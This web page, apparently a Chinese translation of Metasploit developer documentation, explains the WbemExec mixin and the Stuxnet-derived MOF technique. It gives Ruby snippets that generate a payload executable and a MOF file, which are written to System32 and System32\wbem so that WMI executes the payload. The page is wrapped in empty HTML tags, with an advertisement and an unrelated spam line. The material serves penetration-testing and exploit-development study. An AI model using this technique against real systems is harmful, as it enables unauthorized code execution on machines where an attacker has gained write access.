<ruby id="bdb3f"></ruby>

    <p id="bdb3f"><cite id="bdb3f"></cite></p>

      <p id="bdb3f"><cite id="bdb3f"><th id="bdb3f"></th></cite></p><p id="bdb3f"></p>
        <p id="bdb3f"><cite id="bdb3f"></cite></p>

          <pre id="bdb3f"></pre>
          <pre id="bdb3f"><del id="bdb3f"><thead id="bdb3f"></thead></del></pre>

          <ruby id="bdb3f"><mark id="bdb3f"></mark></ruby><ruby id="bdb3f"></ruby>
          <pre id="bdb3f"><pre id="bdb3f"><mark id="bdb3f"></mark></pre></pre><output id="bdb3f"></output><p id="bdb3f"></p><p id="bdb3f"></p>

          <pre id="bdb3f"><del id="bdb3f"><progress id="bdb3f"></progress></del></pre>

                <ruby id="bdb3f"></ruby>

                合規國際互聯網加速 OSASE為企業客戶提供高速穩定SD-WAN國際加速解決方案。 廣告
                Windows管理規范(WMI)是Microsoft實施的基于Web的企業管理(WBEM),它使用管理對象格式(MOF)來創建通用信息模型(CIM)類。在Stuxnet誕生之前,安全社區實際上并不熟悉這種技術的惡毒,Stuxnet使用MOF文件來利用漏洞,允許攻擊者通過假打印機后臺處理程序服務創建文件。這個技術后來在Metasploit的ms10_061_spoolss.rb模塊中進行了逆向和演示,這大大改變了我們處理寫入權限攻擊的方式。一般來說,如果你發現自己能夠寫入system32,你很可能會利用這種技術。 ### 要求 要能夠使用`WBemExec` mixin,您必須滿足以下要求: * `C:\Windows\System32\` 寫入權限 * `C:\Windows\System32\Wbem\` 寫入權限 * 目標不能比Windows Vista更新(所以對于XP,Win 2003或更早的版本來說,這些功能大多是好的)。這更多的是API的限制,而不是技術。較新的Windows操作系統需要首先預編譯MOF文件。 ### 用法 首先,在你的`Metasploit3`類范圍內包含`WbemExec` mixin 。您還需要`EXE ` mixin生成一個可執行文件: ~~~ include Msf::Exploit::EXE include Msf::Exploit::WbemExec ~~~ 接下來,生成有效載荷名稱和可執行文件: ~~~ payload_name = "evil.exe" exe = generate_payload_exe ~~~ 然后使用該generate_mof方法生成mof文件。第一個參數應該是mof文件的名稱,第二個參數是有效負載名稱: ~~~ mof_name = "evil.mof" mof = generate_mof(mof_name, payload_name) ~~~ 現在,您已經準備好將文件寫入/上傳到目標機器。始終確保您首先上傳有效負載可執行文件到`C:\Windows\System32\`。 ~~~ upload_file_to_system32(payload_name, exe) # Write your own upload method ~~~ 然后現在你可以上傳`mof`文件到`C:\Windows\System32\wbem\`: ~~~ upload_mof(mof_name, mof) # Write your own upload method ~~~ 一旦mof文件被上傳,Windows管理服務應該選擇并執行它,這將最終在system32中執行你的有效載荷。另外,使用后,mof文件將自動移出mof目錄。 ### 參考 https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/wbemexec.rb https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/smb/ms10_061_spoolss.rb
                  <ruby id="bdb3f"></ruby>

                  <p id="bdb3f"><cite id="bdb3f"></cite></p>

                    <p id="bdb3f"><cite id="bdb3f"><th id="bdb3f"></th></cite></p><p id="bdb3f"></p>
                      <p id="bdb3f"><cite id="bdb3f"></cite></p>

                        <pre id="bdb3f"></pre>
                        <pre id="bdb3f"><del id="bdb3f"><thead id="bdb3f"></thead></del></pre>

                        <ruby id="bdb3f"><mark id="bdb3f"></mark></ruby><ruby id="bdb3f"></ruby>
                        <pre id="bdb3f"><pre id="bdb3f"><mark id="bdb3f"></mark></pre></pre><output id="bdb3f"></output><p id="bdb3f"></p><p id="bdb3f"></p>

                        <pre id="bdb3f"><del id="bdb3f"><progress id="bdb3f"></progress></del></pre>

                              <ruby id="bdb3f"></ruby>

                              哎呀哎呀视频在线观看